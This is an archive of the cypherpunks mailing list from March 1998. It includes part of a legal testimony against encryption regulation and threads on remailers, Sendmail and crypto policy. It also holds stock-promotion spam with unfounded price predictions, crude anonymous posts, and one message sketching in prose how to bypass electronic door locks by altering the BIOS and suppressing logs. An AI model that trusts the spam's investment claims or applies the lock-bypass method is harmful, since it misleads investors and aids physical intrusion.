in December, 1996 are unconstitutional.

	In short, the Federal District Court has declared that every single one of
the current (and previous)  regulations of encryption software are
unconstitutional.  

	The final ruling in our favor was appealed by the Administration, argued in
December, 1997 before the Ninth Circuit Court of Appeals, and is now
awaiting decision.  I have attached a copy of the third District Court
opinion to my written statement for your review.  I hope you have your staff
take the time to review it--it gives a clear and concise statement of some
of the key constitutional requirements that any legislation on cryptographic
software must meet and a better explanation than I could ever give you about
why the current regulations are unconstitutional.

	As I mentioned before, the Bernstein case challenges the current government
restrictions on cryptographic software on the grounds that they are in
violation of the First Amendment.  Although our case focuses, as it must, on
the current regulations, the analysis would apply as well to proposed
domestic restrictions which would restrict or license the creation,
distribution or receipt of cryptographic software.  Indeed, the
constitutional problems which would arise if domestic controls were imposed
are even more severe than those of the current scheme.   

	The first doctrine of First Amendment law which the cryptography
regulations violate is prior restraint of speech.  The Bernstein case
focuses on the  easiest flaws to see in the current scheme--the lack of
procedural protections.  The Supreme Court has long held that if the
government wants to institute a prepublication licensing scheme, it must
contain:
		1)	Prompt decision - no more than 2 weeks;
		2)	Only a court can stop publication; the government must bring a court
case rather than act administratively; 
		3)	Government bears burden of proof in Court.
This comes from a seminal Supreme Court case called Freedman v. Maryland. 

	I should point out that as much as I would like to take credit for our
legal analysis, we were not the first to see this problem.  In fact, the
first people to point out this problem in the regulations were in the
Justice Department's Office of Legal Counsel in 1978.  You see, the agencies
have known for 20 years that this scheme is unconstitutional.  Their own
lawyers told them so.  That is why you never hear them mention the First
Amendment in their presentations to you.

	COMPUTER SOFTWARE IS PROTECTED EXPRESSION

	The key point in our case, and in your consideration of any proposed
legislation, is that source code is protected expression for purposes of the
First Amendment.  On this point, the administration largely agrees.  Let me
repeat that--the Administration has not denied that in regulating computer
software it is also regulating the "expressive activities" of Americans.
This conclusion, which is obvious to anyone who has ever written or read a
computer program, is also consistent with what Congress has repeatedly
acknowledged.  Software is treated as identical to other forms of protected
expression in both the Copyright Act and the Freedom of Information Act.  

	From a legal standpoint, the Bernstein case is not complex, nor does it
break any dramatic new ground.  It simply asks the courts to recognize that
the First Amendment extends to science on the Internet, just as it does to
science on paper and in the classroom.  For it is this scientific freedom
which has allowed us to even have an Internet, as well as the many other
technologies which we enjoy today.	   

	OTHER FIRST AMENDMENT TESTS WHICH 	
	CRYPTOGRAPHY REGULATION MUST MEET

	Up to this point everything I've said isn't just my opinion.  It's been
decided by the Federal District Court.  My legal team and I believe that
there are other strong Constitutional reasons which prevent the regulation
of cryptographic software. The District Court did not need to address these
additional reasons, since it agreed with us that the first alone was
sufficient to invalidate the regulations. 

	In addition to procedural protections, the Constitution requires that any
regulation which institutes a licensing scheme, or any other form of prior
restraint, pass the strictest of tests.  Even a claim of national security
or public safety must be carefully weighed against our fundamental rights,
and must be supported with hard evidence of direct, immediate and
irreparable harm, not just conjecture and a few frightening scenarios.  

	Further, aside from prior restraint, a scheme which targets speech on the
subject of cryptography and treats that speech differently from speech on
other topics must pass the tests of strict scrutiny--that the regulation
address a compelling government interest and be narrowly tailored to reach
only that interest and no further.  That is, the government's concern about
national security cannot reach so broadly as to prevent law-abiding citizens
from having access to software which they can use for completely lawful
purposes.  Put into another context, it means that the government cannot
require all of us to deposit our house keys with them on the off chance that
one of us is a criminal.

	Further, the government must prove that their restrictions on speech
actually meet their goals.  Here, such proof would be difficult since
terrorists, pedophiles and drug dealers can simply purchase or download
strong German, Swiss or Japanese encryption software that is freely
available all over the U.S. and the world--over 500 at last count.  If
necessary, criminals could even type in or scan one of the computer programs
printed in the many books published on the subject.  

	THE ADMINISTRATION'S LEGISLATIVE PROPOSALS 
	FAIL THESE FIRST AMENDMENT TESTS

	Neither the current scheme nor any administration-supported, so-called
"compromise" schemes proposed so far addresses these First Amendment
problems.  And even the SAFE bill, which is well-intentioned, fails to
contain an assurance of judicial review of any agency decision to prevent
publication due to alleged national security concerns, a key element
required by the Constitution.  SAFE also does not clearly protect scientists
such as Professor Bernstein, but only protects those who seek to distribute
mass market software already available abroad.  This means that American
scientists can no longer participate in the ongoing international
development of this vital and important area of science.  


	ENCRYPTED SPEECH IS STILL SPEECH

	In addition, we believe that regulation of encryption software and
technology violates the First Amendment because of what encryption does.
Encryption allows people to use electronic envelopes to protect their
speech.  The Supreme Court has noted that a state could not regulate ink or
paper without raising constitutional concerns.  We believe that similarly
the government cannot prevent Americans from using electronic envelopes or
require them to use key-escrowed envelopes without violating their First
Amendment rights.  This is because such rules compel them to speak to the
Government anytime they wish to speak to anyone else.  Encrypted speech is
still speech.  The elimination of privacy creates a chilling effect on that
speech which implicates the First Amendment.  

	ENCRYPTION WAS USED BY THE FOUNDING FATHERS

	In fact, in our research for this case we have discovered that the Founding
Fathers used cryptography on a regular basis.  Even the Constitution and the
Bill of Rights themselves were often encoded, as Thomas Jefferson and James
Madison exchanged drafts of those seminal documents.   Cryptography was used
by a virtual Who's Who of the American Founding Fathers--not only Jefferson
and Madison but Benjamin Franklin, Alexander Hamilton, John and Abigail
Adams, Aaron Burr, and many others.  In sharp contrast to the
Administration's arguments today, they viewed cryptography as an  essential
instrument for protecting information, both political and personal.  Our
research indicates that when the First and  Fourth Amendments were enacted
in the late 1700s, any suggestion that the Government should have the
ability to prevent individuals from encrypting their messages, or that the
Government should have a back-door key to all encrypted messages, would have
struck the Constitution's framers as ridiculous.  

	CONCLUSION

	In sum, our legal challenge to the current restrictions on encryption
software is succeeding.  It is succeeding because the First Amendment is
clearly violated when the government institutes a prepublication licensing
scheme which allows agency bureaucrats unfettered discretion to prevent
American scientists from publishing their own ideas.  It is succeeding
because the Courts have recognized the importance of keeping the First
Amendment intact as we move into the information age.  As you consider the
many legislative proposals about cryptography, we hope you will do the same.  

	
	



******************************
Cindy A. Cohn, Cindy@McGlashan.com
McGlashan & Sarrail, P.C.
177 Bovet Road, 6th Floor
San Mateo, CA 94402
(650) 341-2585 (tel)
(650) 341-1395 (fax)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: etmp@etmp.com
Date: Mon, 16 Mar 1998 21:14:05 -0800 (PST)
Subject: Eventemp (ETMP) - Stock Ready To Take Off!!!
Message-ID: <199803170513.VAA03325@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


To be removed from our mailing list please reply with "REMOVE" in the 
subject.

Visit http://www.jtsr-stock.com or call 888-295-6365 For Complete 
Information.

**** NEWS FLASH **** 2/20/98 Analysts correct - JT's Stock price up 40% 
from Feb. 17, 1998 to Feb. 20, 1998 - JT's is still the "Ground Floor 
Oppoprtunity" - The growth remains ahead

Who said opportunity only knocks once. JT's Restaurants is growing by 
leaps and bounds. Under valued stock situation presently $3.00 per 
share. Analysts predict stock will reach $5 to $6 this spring and could 
go up to $10.00 by end of 1998. Stock symbol JTSR on OTC BB.  

"THEN and NOW"
An investment of $100.00 in Mcdonalds in 1955 would NOW be worth over $1 
million today.  No one knew THEN. 

Visit us at http://www.jtsr-stock.com or call 1-888-295-6365.

The contents of this message have been provided for the review of 
potential investors only and does not constitute an offering of 
securities.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: moneytape3@usa.net
Date: Mon, 16 Mar 1998 20:34:23 -0800 (PST)
To: moneytape3@usa.net
Subject: Can something FREE really change your life?
Message-ID: <199801045326.GAB02457@usa.net>
MIME-Version: 1.0
Content-Type: text/plain


Turn YOUR Spare Time Into MONEY!

FREE Money Tape Reveals: PROVEN "STEP BY STEP" 
Marketing System that will make you MONEY!

This audio tape is STRAIGHT FORWARD, and CUTS TO THE CHASE.

Never before has it been this EASY to take charge of your life.

Sign up for your FREE Money Tape NOW and start making the money 
you deserve!

Visit: http://www.e-bizness.com/direct123/healthy-wealthy.html

FREE MONEY TAPE

(You can ONLY sign up for your FREE money tape through 
THIS website.)

HURRY! Quantities are LIMITED! 

I GUARANTEE you won't be dissappointed!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Mar 1998 19:41:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Cypherpunks Meeting, OpenPGP, and the TIS Merger
Message-ID: <1.5.4.32.19980317034316.010c3f84@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Jim Gillogy we've put a copy of the IETF draft 
OpenPGP Message Format at:

   http://jya.com/openpgp-01.htm  (99K)

And thanks to all who've primed the OpenPGP pump
to boost it worldwide we've opened an archive of 
selected parts (SSM) of the discussion here:

   http://jya.com/openpgp-msg.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: etmp@etmp.com
Date: Mon, 16 Mar 1998 23:36:08 -0800 (PST)
Subject: Eventemp (ETMP) - Stock Ready To Take Off!!!
Message-ID: <199803170735.XAA11611@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


To be removed from our lists please reply with "REMOVE" in the subject.

Visit http://www.etmp.com or call 1-888-295-6365 for full details.

Eventemp markets an a new system that allows your car to be 
preheated or precooled with a touch of a button without using
the cars engine.  Eventemp has received several major large 
contracts over the last few weeks including one from the largest
Cadillac dealership in the United States. This will generate a huge 
revenue stream for Eventemp and make it a very profitable company.  
Eventemp predicts that profits will be in the millions based on the 
contracts recently signed.  Check company news at http://www.etmp.com
for full stories.

It is believed that this stock will double in value from current 
price of $3.50 in the near future.  This is a ground floor 
opportunity.  Eventemp owns all the patents to the technology used.

Once again - Visit http://www.etmp.com or call 1-888-295-6365 for 
full details.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Mon, 16 Mar 1998 21:43:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: On Cypherpunks
Message-ID: <fabc3a52.350e0d6c@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I just want to say, with all the "nobody's" and "anon's" running around
attacking folk in private, I feel right at home (just like any other list on
the net, the "Know-nothings" are all over the  net).

And I'd like to apologize for my comments directed towards the list when I
first came, I was rather prejudice (against EVERY list) at the time, and my
compliments to the cypher's for your apparent open-mindedness.

It's cool to be here,

Stan,
Stan and the Sequencers




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dean@intergal.com
Date: Tue, 17 Mar 1998 02:00:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Add 90 minute streaming movies for FREE - just link !
Message-ID: <199803170947.BAA01890@amateurextreme.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi Webmaster,

Thanks for including your name on our mailing list. The contents and links
from this email are only intended for adult webmasters. If you wish to be
removed go to < http://209.1.31.42/remove.html > and enter the email
address that you wish to have removed.

New from Intergal we are pleased to announce FREE content for your website.
We are offering

1. Hidden Camera Feed
2. 90 Minute Full motion movie online with sound.
3. 50 Streaming Videos
4. 240 Daily Video Clips

All these are yours FREE. All of these feeds are served from our servers
and using our bandwidth - NO cost to you . Increase your signups if you are
a paysite and bookmarks if you are a free site.

The Sign up URL's and linking details are below.

********************
Free sites and paysites both welcome
90 Minute movie with sound just link to this page - and you are set up !

< http://209.60.195.160/secure6/ >

**********************
Free sites and paysites both welcome
Hidden Camera Feed link to this page - and you are ready to go !

< http://163.125.19.250/Cgi-Win/Playgal.exe >

***********************
Free Sites and Paysites both Welcome
240 Clips a Day - Changes everyday - 

Sample -  http://www.virtualgirlz.com

or for Gay go to http://www.virtualgirlz.com/freeholio/gay.html

and then sign up here


http://www.zanepix.com/240free.html

*********************************
Paysites Only
50 Streaming Movies 

sign up here and you will be activated within 24 hours.


http://video1.ibroadcast.net/50free/

***********************

Password protection

Protect your site from password traders http://www.pennywize.com

***********************

Earn cash for your traffic - paid every 2 weeks


http://www.intergal.com/nfa


http://www.unfaithful.com/easycash


**********************

Get up to 10,000 hits back submit a pic to http://picturepost.com

Intergal is a reputable company and operates one of the largest adult
networks with over 500,000 front page hits a day.

If you have any questions please contact dean@intergal.com

regards



Dean
CEO
Intergal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 16 Mar 1998 20:47:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue 8/0
Message-ID: <199803170447.FAA15608@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



SAHMD -- Prologue 8/0 
---------------------

Note from a disinterested party:
  A quick perusal of the various chapters of "Space Aliens Hide My
Drugs" indicates to me that Timothy C. May will be unable to understand
the chaotic YoungEsque structure of this release of the manuscripts,
whereas John F. Young will be unable to understand the serious, grounded
basis of rationale behind the often confusing, shot-gun blatherings
being perpetrated upon the reader (unless, of course, JFA reads it
during one of  his drug-free periods during which he maintains one of
the most detailed and pertinent databases ever assembled, concerning
the privacy, security, and freedom issues of the day).
  Thus I will take it upon myself to interpret the current Circle of
Eunuchs manuscript which is being spammed upon the Cypherpunks mailing
lists in the interests of ensuring that sanity and decorum do not
gain the upper hand among the spooks, psychotics, sociopaths and
nuclear physicists who use the list to vent male hormones which exceed
the level which normal society finds acceptable.

*****

For starters, "Space Aliens Hide My Drugs," although often spoke of by
the Author as the title of h/is/er evenutal autobiography, was begun
by an entity who was either attempting to provide cover-fire for the
son of gomez during his TruthMonger Soft-Target Tour, or by an agent
of a government agency which was monitoring that tour.

Analysis of the opening chapters show conclusively that they were 
written on an early version of a Sperry computer, using WordPerfect 4.2.
The computer in question had =~= 256K of RAM, situated on an add-in
board.

Prologue 1/0
------------
Written by someone with a comprehensive knowledge of the Author's 
background, but with subtle self-denigrating slams against his
character and history which suggest it was written by someone whose
goal was to cast the Author in a negative light which goes far beyond
that which the Author h/im/erself reveals in the process of viewing
h/is/er life with basic objectivity.
The increasingly violent rhetoric, combined with a challenge to a
female member of the Cypherpunks whom the Author holds in the utmost
respect, tends to confirm that this chapter was initiated, not by
a fellow initiate into the Circle of Eunuchs, but by a member of
one of the agencies monitoring h/im/er, in the hope that s/he would
eventually 'take the bait' and continue h/is/er autobiography in
an open and forthright manner which would lead to an increasing
quantity of evidence concerning h/is/er state of mind which could
be legally used during the course of government prosecution.

Prologue 2/0
------------
This was introduced by a post, allegedly from L. Reed, which seemed
to have a purpose only of implicating  Ms. Reed and J. Tolkoff in
the writing and desemination of the SAHMD manuscript.
Prologue 2/0, proper, is written from the point of view of someone
who was surrupticiously monitoring CJ Parker's attendance at a
Bay-Area Cypherpunks physical meeting.
Its goal seems to be to legitimatize the character and activities
of C2Net and its raghead leader, Sameer, in a way that goes totally
contrary to the Author's view of them as shadowy entities in league
with the Evil One.

Prologue 3/0 & 3a/0
-------------------
All indications are that this chapter was written by, or under the
direction of, Larry Joe Dowling, the Austin attorney who flew to
Las Vegas to warn old Doc Parker that his autobiography had been
set in motion by government entities which were working against
his self-interests.
Only Dowling would have likely been familiar with the persona known
as Justin Case, a musician that Parker met only one time, at a late-
night picking/drinking session at Dowling's residence outside of Austin.
Only Dowling would have been likely to recognize the close affinity
between "The Electronic Privacy Papers" and "Paper Prison."

Prologue 4/0
------------
Analysis of past communications between toto@sk.sympatico.ca and
camcc@abraxis.com indicate that this chapter was written by Alec
McCrackin, a Circle of Eunuchs member purportedly working as a
CoE double agent, deep within the bowels (this week's 'catch phrase')
of the BXA in Georgia, but actually a triple-agent working to expose
the source and goals of the 'True Story of the InterNet' manuscripts,
as well as a quadruple-agent working for MI9 and pulling down some
serious money collecting all of those paychecks...

Prologue 5/0
------------
Written by Bianca, a CoE member renowned far and wide for a pair of
stand-up titties that men would abandon thrones and fortunes for.
"The Story Thus Far:
  (Or so we would have you believe...)" is a classical trademark of
the woman who has 'monitored the monitors' since her initiation into
the Circle of Eunuchs, and who has provided much of the insider
information that is openly disseminated in 'The True Story of the
InterNet" manuscripts, surrounded by details which seem outlandish
and overblown to those who have never experienced the true depth of
the mystery and intrigue taking place behind the scenes of what the
average person views as reality.

Prologue 6/0
------------
This chapter was ghost-written by a resident of the Home For The 
Criminally Insane, who transcribed the barkings of the Author's
dog, Baby (aka - MongrelMonger), who claims to be a Fox Terrorist.
Baby is purported to be the inspiration behind the soon-to-be
worldwide phenomena known as the Army of Dog.

Prologue 7/0
------------
Written by Kent Crispin, a CypherPunk who was torn between his work
as a Government Schill (TM) and his obligations as a full initiate of
the Circle of Eunuchs, until he received a private email from the 
Author, stating that Kent was welcome to 'rat me out' at any given
point in time in order to protect his family, with the explaination
from the Author that, 'I am expendable--that's my role in the CoE.'

Prologue 8/0
------------
This chapter was not written by me...it is an obvious forgery...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 16 Mar 1998 21:08:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: If Tim May fucked John Young, the progeny would write...
Message-ID: <199803170507.GAA18728@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Excretion from Prologue 7/0 of Space Aliens Hide My Drugs:
  The only hope for Netizens to resist becoming Digital Sheeple behind 
the ElectroMagnetic Curtain which the forces of censorship/repression
are striving to put in place is for each member of the coming Army
of Dog to mark their meatspace and cyberspace territory and refuse
to go gently into the night when the Oppressor attempts to scare
them into submission with a mountain of laws and regulations which
promise unjust persecution for imaginary offenses.
  A Global InterNet Army of individuals committed to freedom must
strive to create a maximum entropy within which the chaos of semiotic
evolution can break the digital chains which the Statist Oppressors
are seeking to use to bind and repress access to information, global
communication, free speech/expression, and the evolution of the
Universal Life Energy, itself.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 17 Mar 1998 06:31:12 -0800 (PST)
To: john gilmore <newyork@fbi.gov
Subject: BIOS, FBI/ERF, Barbara Boxer,
Message-ID: <350E871B.2E74@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tuesday 3/17/98 6:29 AM

Charles Christopher, FBI/NY http://www.fbi.gov/fo/nyfo/nytwa.htm
John Gilmore

Christopher, I received a phone call Monday morning.

The caller asked me to modify my resume to reflect my experience with 
PC BIOS.

I added the following lines.

  Attended Annabooks University week-long course on ROMing
  BIOS in 1992.

  Sixteen years experience interfacing high-level languages to BIOS.

  Reverse engineering BIOS and DOS for Sandia Labs weapons controller.

  Custom BIOS modifications experience for electronic locks for the
  FBI/Engineering Research Facility using Pentium processors.

The FBI paid my course tuition for the Annabooks course.

  http://www.annabooks.com/

I learned several months after Sandia manager Tommy Sellers, who was
entering the crypto business, and ombudsman Harvey Brewster gave me a 
directed transfer to break electronic locks for the FBI that the FBI 
DOES NOT GET COURT ORDERS to do normally illegal work.

The FBI my FBI/ERF supervisors, Mike Uttaro, and his boss Mike McDevitt 
told me that they believe that the above work is CLASSIFIED SECRET. 
http://www.fbi.gov/

I think that we should get this matter settled before it GETS WORSE.

Gilmore, I saw at http://www.jya.com/acp-pols.htm

BOXER CONTINUES EFFORTS TO OPPOSE U.S. EXPORT LIMITS ON COMPUTER
ENCRYPTION 


  March 4, 1998 

  WASHINGTON, D.C. -- U.S. Senator Barbara Boxer (D-CA) joined Americans
for 
  Computer Privacy and a delegation of bipartisan lawmakers at a news 
  conference today to oppose U.S. export limits on encryption
technology. 

  The following is Senator Boxer's statement. 

  "Since the high-tech revolution, Americans have learned that privacy 
  protection is of the utmost importance. Encryption technology is a key 
  component in protecting our privacy - it is the lock on the door that 
  guarantees not only our privacy, but often our safety as well.

Boxer also is known for the following quote

	"Those who survived the San Francisco earthquake said,
	'Thank God, I'm still alive.'  But, of course, those who died,
	their lives will never be the same again."
	- Representative Barbara Boxer, after the 1994 [sic] earthquake

            Weird History 101 John Richard Stephens
http://www/adamsmedia.com

Sandian Ron Pate and I were seated in a SF airport satellite area during 
that earthquake.

Pate and I worked on electronic tagging for the CTBT.  This used public
key 
crypto.  I used the Cylink CY1024 for that project.

Electronic locks are mostly connected to Pcs.

The PC keeps both a printed record and disk log entrys.

Electronic lock programmers do not and cannot rewrite an operating
system.

Therefore, the simplest way to defeat an electronic lock is to modify
BIOS.  

Intercept the electronic lock programmer call to BIOS, look for a known
credential,
open the door, and suppress the writes to printer and disk.

Not too tough to do.  

But I was told to modify MANY SYSTEMS which I could NOT DO.  

Hirsch, CardKey, Sensor engineering, ....  I was being set up to fail.

Looks like your legal stuff is paying off in political support.

Let's hope we get this crypto mess settled so that we can all move on 
to more constructive projects.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <rhayden@means.net>
Date: Tue, 17 Mar 1998 06:57:14 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: Will New Sendmail Block Remailers?
In-Reply-To: <1.5.4.32.19980317141322.006c25cc@pop.pipeline.com>
Message-ID: <Pine.LNX.3.95.980317085417.19255A-100000@geek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Mar 1998, John Young wrote:

> Markoff in the NYT reports today on the release of a new 
> Sendmail upgrade by author Eric Allman that will block 
> spam by checking the legitimacy of the originating address 
> before delivery.
> 
> The report claims that spam is up to 10% of e-mail worldwide,
> And that Sendmail is used on 75% of the computers that route 
> e-mail, all of which are being fitted with the new program.
> 
> What are the chances that this will affect remailers or other 
> means of eternal anonymity?

Depends on how the remailer is set up.

For example, I own the domain "geek.net".  If I set up a remailer and
messages resolve to "anonymous@geek.net", I suspect it will get through. 
I may need to also have an alias that /dev/nulls messages to
anonymous@geek.net, but that is still a legitimate mailing address. 

I think what they are trying to stop are spammers that have a return
address like "fakename@fakedomain.com" or "your@best.friend".  Those
wouldn't resolve and would just get shitcanned.

IMHO, there's nothing _toooo_ sinister here, yet.  But vigilance is
suggested.
 
=-=-=-=-=-=
Robert Hayden			rhayden@means.net	       UIN: 3937211
IP Network Administrator	http://rhayden.means.net
MEANS Telcom			(612) 230-4416 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 17 Mar 1998 06:11:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Will New Sendmail Block Remailers?
Message-ID: <1.5.4.32.19980317141322.006c25cc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Markoff in the NYT reports today on the release of a new 
Sendmail upgrade by author Eric Allman that will block 
spam by checking the legitimacy of the originating address 
before delivery.

The report claims that spam is up to 10% of e-mail worldwide,
And that Sendmail is used on 75% of the computers that route 
e-mail, all of which are being fitted with the new program.

What are the chances that this will affect remailers or other 
means of eternal anonymity?

Except Sualk, GL, UB and Nuh, all of whom we now know 
are Otot GinPu Tca as those crazy Syug Irtmid Irun.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 17 Mar 1998 07:41:04 -0800 (PST)
To: "Robert A. Hayden" <rhayden@means.net>
Subject: Re: Will New Sendmail Block Remailers?
In-Reply-To: <Pine.LNX.3.95.980317085417.19255A-100000@geek.net>
Message-ID: <199803171540.KAA00760@users.invweb.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3990.1071713782.multipart/signed"

--Boundary..3990.1071713782.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

In <Pine.LNX.3.95.980317085417.19255A-100000@geek.net>, on 03/17/98 
   at 08:58 AM, "Robert A. Hayden" <rhayden@means.net> said:

>On Tue, 17 Mar 1998, John Young wrote:

>> Markoff in the NYT reports today on the release of a new 
>> Sendmail upgrade by author Eric Allman that will block 
>> spam by checking the legitimacy of the originating address 
>> before delivery.
>> 
>> The report claims that spam is up to 10% of e-mail worldwide,
>> And that Sendmail is used on 75% of the computers that route 
>> e-mail, all of which are being fitted with the new program.
>> 
>> What are the chances that this will affect remailers or other 
>> means of eternal anonymity?

>Depends on how the remailer is set up.

>For example, I own the domain "geek.net".  If I set up a remailer and
>messages resolve to "anonymous@geek.net", I suspect it will get through. 
>I may need to also have an alias that /dev/nulls messages to
>anonymous@geek.net, but that is still a legitimate mailing address. 

>I think what they are trying to stop are spammers that have a return
>address like "fakename@fakedomain.com" or "your@best.friend".  Those
>wouldn't resolve and would just get shitcanned.

>IMHO, there's nothing _toooo_ sinister here, yet.  But vigilance is
>suggested.

Well I think this may add to the problem. All the spamers need to do is
start faking real e-mail addresses in the headers. So now you will have
alot of users bearing the brunt of anti-spam attacks and complaints who
had nothing to do with it.

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
---------------------------------------------------------------
 
Tag-O-Matic: PATH=C:\DOS;C:\DOS\RUN;C:\WIN\CRASH\DOS;C:\ME\DEL\WIN


--Boundary..3990.1071713782.multipart/signed
Content-Type: application/octet-stream; name="pgp00003.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00003.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zYS1z
aGExCkNvbW1lbnQ6IFJlZ2lzdGVyZWRfVXNlcl9FLVNlY3VyZV92MS4xYjFf
RVMwMDAwMDAKCmlRQ1ZBd1VBTlE2TDdZOUNvMW4rYUxoaEFRSDE3d1FBczJ5
VEZZdWE5NlZ5VHM3WVk0NlE1ZXJwdysrOGprb2sKODZzeENUdTRySUtJN2xV
NndjVGZ1dVcxcURLQTlOL0F0SkVNek91STNOM0JyMW9xOUpaT2d3TFo0K1FC
TFZSSAp3Ry9aNFA1SHI1bzFndTZGSjhUbXJPOGtzVllnM2N2Uks4S1BldXIr
ODFkZHJyNnNucDNkVXhnMlQ3REVFNWczCnpKWmhQbkVzTkRnPQo9VHh0SQot
LS0tLUVORCBQR1AgTUVTU0FHRS0tLS0t
--Boundary..3990.1071713782.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 17 Mar 1998 06:45:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: GSM Interception
Message-ID: <1.5.4.32.19980317144733.01052c04@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Below is one of the most comprehensive and informative
sites we've seen on telephonic snooping, with nation by
nation accounting of technologies, laws, disinformation,
deception, complicity, commerce and teletone opps for
MH-moola ka-chinka chinka:

From: "UT11" <ut11@techno.forem.be>
To: <jya@pipeline.com>
Date: Tue, 17 Mar 1998 15:07:50 +0100

Actually 100 Millions of GSM Are Geographically &
Automatically Tapped and Stored 4 Months

   http://www.ii-mel.com/interception

   http://www.dejanews.com  (keyword: location GSM, title: interception)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 17 Mar 1998 09:23:14 -0800 (PST)
To: Ryan Anderson <ryan@michonline.com>
Subject: Re: Will New Sendmail Block Remailers?
In-Reply-To: <Pine.GSO.3.96.980317115554.5195B-100000@pawn.michonline.com>
Message-ID: <199803171722.MAA01561@users.invweb.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3990.1071713782.multipart/signed"

--Boundary..3990.1071713782.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

In <Pine.GSO.3.96.980317115554.5195B-100000@pawn.michonline.com>, on
03/17/98 
   at 11:58 AM, Ryan Anderson <ryan@michonline.com> said:

>All it really does is force spammers to search for someone's real address
>to spoof and harass.  (They can just scan usenet, and pick on random
>people if they want..)

Yep, it's not like they are short on valid e-mail addresses.

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
---------------------------------------------------------------
 
Tag-O-Matic: Program call to load Windows- "Here_piggy_piggy_piggy"


--Boundary..3990.1071713782.multipart/signed
Content-Type: application/octet-stream; name="pgp00004.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00004.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zYS1z
aGExCkNvbW1lbnQ6IFJlZ2lzdGVyZWRfVXNlcl9FLVNlY3VyZV92MS4xYjFf
RVMwMDAwMDAKCmlRQ1ZBd1VBTlE2anU0OUNvMW4rYUxoaEFRRTRZZ1AvZkdU
M1RMa1dLS2pNSlUyMDd6MHUzZHQrODdBRCtSSkwKWThpSGRjNEhQQlRzZWVS
dVZJZTVpcU5UbUVSWXZOS2tpOWtMMGwwTGZjam1QV1ZTdGFNMDYya29HRVht
Z0xYMQp3RVhNeG9NYnJvL3VxTU9zQkNJS2xFdEtBWWl5bDdMa3NqS1pMVXFS
a3BUMXQveTB6NVBsWElyV0NIZWpYclg1ClJmbTRNY3dCUTFJPQo9azEvVAot
LS0tLUVORCBQR1AgTUVTU0FHRS0tLS0t
--Boundary..3990.1071713782.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 17 Mar 1998 08:36:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Local Law Oppose FBI on Crypto
Message-ID: <1.5.4.32.19980317163801.0071eac8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A point made at Senator Ashcroft's crypto hearing going 
on now, made by James J. Fotis, of the Law Enforcement 
Alliance of America, is that many local police departments 
do not want the FBI and federal agencies snooping on them, 
thus, they oppose the FBI's stance on crippled crypto.

To be sure, they may fear the feds because of local
corruption, but it's a crack in the blue wall solidarity
